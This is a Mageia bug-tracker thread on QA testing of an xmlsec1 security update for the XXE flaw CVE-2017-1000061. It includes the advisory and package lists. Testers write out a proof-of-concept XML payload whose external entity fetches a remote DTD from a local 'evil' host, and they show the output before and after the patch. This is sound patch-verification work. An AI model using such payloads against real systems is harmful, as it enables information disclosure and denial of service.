Bug 21586

Assigning to all packagers collectively, since there is no registered maintainer for this package.

Assignee: bugsquad => pkg-bugs
CC: (none) => marja11

pushed in updates_testing
src.rpm:
        xmlsec1-1.2.24-1.mga5
        xmlsec1-1.2.24-1.mga6

Assignee: pkg-bugs => qa-bugs

Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external
entity expansion (XXE) along with validation. An attacker could craft an XML
file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs,
leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://access.redhat.com/errata/RHSA-2017:2492
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.24-1.mga5
libxmlsec1_1-1.2.24-1.mga5
libxmlsec1-openssl1-1.2.24-1.mga5
libxmlsec1-nss1-1.2.24-1.mga5
libxmlsec1-gnutls1-1.2.24-1.mga5
libxmlsec1-gcrypt1-1.2.24-1.mga5
libxmlsec1-devel-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
libxmlsec1_1-1.2.24-1.mga6
libxmlsec1-openssl1-1.2.24-1.mga6
libxmlsec1-nss1-1.2.24-1.mga6
libxmlsec1-gnutls1-1.2.24-1.mga6
libxmlsec1-gcrypt1-1.2.24-1.mga6
libxmlsec1-devel-1.2.24-1.mga6

from SRPMS:
xmlsec1-1.2.24-1.mga5.src.rpm
xmlsec1-1.2.24-1.mga6.src.rpm

Testing this on mga5::x86_64, later.

CC: (none) => tarazed25

mga5  x86_64

CVE-2017-1000061
PoC for XML External Entity attack.
https://github.com/lsh123/xmlsec/issues/43

Created file xinput.xml
$ cat xinput.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]>

Fake command:
$ xmlsec1 --verify --output output.xml input.xml 
input.xml:1: I/O warning : failed to load HTTP resource
TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:2: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

Updated from Core Updates testing:

- lib64xmlsec1-devel-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64
- lib64xmlsec1_1-1.2.24-1.mga5.x86_64
- xmlsec1-1.2.24-1.mga5.x86_64

$ xmlsec1 --verify --output output.xml copy.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL
copy.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "copy.xml"
Error: failed to load document "copy.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "copy.xml"

That appears to have worked.  The updated software refuses to entertain External Entities.

Continuing from comment 5.
xmlsec1 looks like a standalone and
$ urpmq --whatrequires lib64xmlsec1_1
lib64aqebics0
lib64xmlsec1-devel
lib64xmlsec1-gcrypt1
lib64xmlsec1-gnutls1
lib64xmlsec1-nss1
lib64xmlsec1-openssl1
lib64xmlsec1_1
xmlsec1

shows that the library is required by other libraries.

Giving this the OK based on a clean install and a positive PoC test.

mga6  X86_64

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]>

$ xmlsec1 --verify --output output.xml input.xml
error : Operation in progress
input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd"
!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:3: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

After updating the xml packages:
$ xmlsec1 --verify --output output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:3: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This is good for 64-bits.

Validating under temporary policy as we have 1 test per release.

Keywords: (none) => validated_update
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK advisory
CC: (none) => lewyssmith, sysadmin-bugs

An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2017-0305.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED